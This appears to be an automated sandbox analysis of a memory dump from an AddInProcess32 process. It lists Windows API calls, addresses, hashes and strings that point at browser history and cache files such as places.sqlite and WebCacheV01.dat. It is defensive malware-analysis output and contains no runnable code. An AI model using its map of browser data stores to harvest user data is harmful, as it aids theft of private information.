                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: @ $SQLite format 3
                                            • API String ID: 1475443563-3708268960
                                            • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                            • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                            APIs
                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            • memset.MSVCRT ref: 00414C87
                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 2705122986-2036018995
                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _wcsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 1579243037-1578091866
                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                            APIs
                                            • memset.MSVCRT ref: 0040E60F
                                            • memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Strings
                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                            • API String ID: 3354267031-2114579845
                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                            APIs
                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                            APIs
                                            Strings
                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                            • API String ID: 2221118986-1725073988
                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??3@DeleteObject
                                            • String ID: r!A
                                            • API String ID: 1103273653-628097481
                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                            APIs
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$memcmp
                                            • String ID: $$8
                                            • API String ID: 2808797137-435121686
                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                            Strings
                                            • too many columns on %s, xrefs: 00430763
                                            • duplicate column name: %s, xrefs: 004307FE
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: duplicate column name: %s$too many columns on %s
                                            • API String ID: 0-1445880494
                                            • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                            • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                            • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                            • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                            APIs
                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                            • String ID:
                                            • API String ID: 1979745280-0
                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                            APIs
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                            • memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                            • String ID: history.dat$places.sqlite
                                            • API String ID: 2641622041-467022611
                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                            APIs
                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                            • GetLastError.KERNEL32 ref: 00417627
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ErrorLast$File$PointerRead
                                            • String ID:
                                            • API String ID: 839530781-0
                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID: *.*$index.dat
                                            • API String ID: 1974802433-2863569691
                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                            • GetLastError.KERNEL32 ref: 004175A2
                                            • GetLastError.KERNEL32 ref: 004175A8
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FilePointer
                                            • String ID:
                                            • API String ID: 1156039329-0
                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Temp$DirectoryFileNamePathWindows
                                            • String ID:
                                            • API String ID: 1125800050-0
                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                            APIs
                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CloseHandleSleep
                                            • String ID: }A
                                            • API String ID: 252777609-2138825249
                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                            APIs
                                            • malloc.MSVCRT ref: 00409A10
                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • free.MSVCRT ref: 00409A31
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID:
                                            • API String ID: 3056473165-0
                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                            APIs
                                            Strings
                                            • failed memory resize %u to %u bytes, xrefs: 00415358
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: realloc
                                            • String ID: failed memory resize %u to %u bytes
                                            • API String ID: 471065373-2134078882
                                            • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                            • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                            • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                            • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: BINARY
                                            • API String ID: 2221118986-907554435
                                            • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                            • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /stext
                                            • API String ID: 2081463915-3817206916
                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
